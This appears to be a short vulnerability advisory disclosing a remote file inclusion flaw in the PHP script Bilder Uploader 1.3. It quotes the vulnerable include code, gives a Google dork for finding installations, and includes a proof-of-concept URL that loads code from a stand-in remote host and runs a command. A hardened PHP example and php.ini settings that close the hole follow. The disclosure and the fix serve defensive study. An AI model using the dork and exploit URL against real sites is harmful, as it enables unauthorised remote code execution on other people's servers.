Bilder Uploader 1.3 Remote Command Execution Vulnerability
-----------------------------------------------------------------------
Script  : Bilder Uploader
Version : 1.3
Site    : http://www.mapos-scripts.de
Founder : Rizgar
Contact : rizgar@xxxxxxxxxxxxx and irc.gigachat.net #kurdhack
Thanks  : Kurdish Hackers Clan(Anti Fashist Group :P), PH(HERO) , ColdHackers(nice boys)
d0rk    : "Copyright (c) 2007 by Mapos-Scripts.de",
-----------------------------------------------------------------------

Okay, look at nice codes :)

<?php
include($config["root_ordner"].'config.php');
include($config["root_ordner"].'includes/dbconnect.php');
include($config["root_ordner"].'includes/function.php');
$header = style('index_body','header');
$header = ereg_replace("{wobinich}", "Mitglieder Gruppen", $header);
echo $header;
$gruppen_id = intval($_GET["gruppe"]);
if (!empty($gruppen_id)) {
?>

$config["root_ordner"] is passed to include() before anything in the script assigns it, so on a server that registers request parameters as globals (register_globals) the include path is taken from the request (remote file inclusion):

http://www.site.com/path/gruppen.php?config[root_ordner]=http://evil.txt?&cmd=id

And others...

bild.php
feed.php
mitglieder.php
online.php
profil.php
..
..
..

Eof.
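A hardened form of the include pattern above, as an added example that is not part of the advisory or of the Mapos-Scripts code: the root is fixed in code before any include, and the resolved path must be a local file under it. The function names, the temporary demo directory and the example.invalid URL are constructed for illustration; PHP 7 or later on the command line is assumed.

```php
<?php
// Added example (not Mapos-Scripts code); function names are hypothetical.

// True if any request source tries to supply the $config global.
function request_overrides_config(array ...$sources): bool
{
    foreach ($sources as $src) {
        if (array_key_exists('config', $src)) {
            return true;
        }
    }
    return false;
}

// Resolve $relative under a server-side root. realpath() only resolves
// local files, so a URL root or a path escaping the root is refused.
function local_include_path(string $root, string $relative): string
{
    $rootReal = realpath($root);
    if ($rootReal === false || !is_dir($rootReal)) {
        throw new RuntimeException('application root is not a local directory');
    }
    $prefix = rtrim($rootReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    $target = realpath($prefix . $relative);
    if ($target === false || strncmp($target, $prefix, strlen($prefix)) !== 0) {
        throw new RuntimeException("refusing include: $relative");
    }
    return $target;
}

// Constructed demo: a temporary application root holding a config.php.
$root = sys_get_temp_dir() . '/bu_demo_' . getmypid();
@mkdir($root);
file_put_contents("$root/config.php", "<?php return 'config loaded';\n");
// The root is fixed in code before any include, never read from the request.
$config = array('root_ordner' => $root . '/');
$loaded = include local_include_path($config['root_ordner'], 'config.php');
var_dump($loaded);

// Constructed request carrying the parameter name from the advisory's URL.
$get = array('config' => array('root_ordner' => 'http://example.invalid/'));
var_dump(request_overrides_config($get));   // such a request should be rejected
try {
    local_include_path($get['config']['root_ordner'], 'config.php');
} catch (RuntimeException $e) {
    echo $e->getMessage(), "\n";            // a URL is not a local directory
}
unlink("$root/config.php");
rmdir($root);
```

Independently of the code change, register_globals = Off and allow_url_include = Off (PHP 5.2 and later) in php.ini remove the two conditions the advisory's URL depends on.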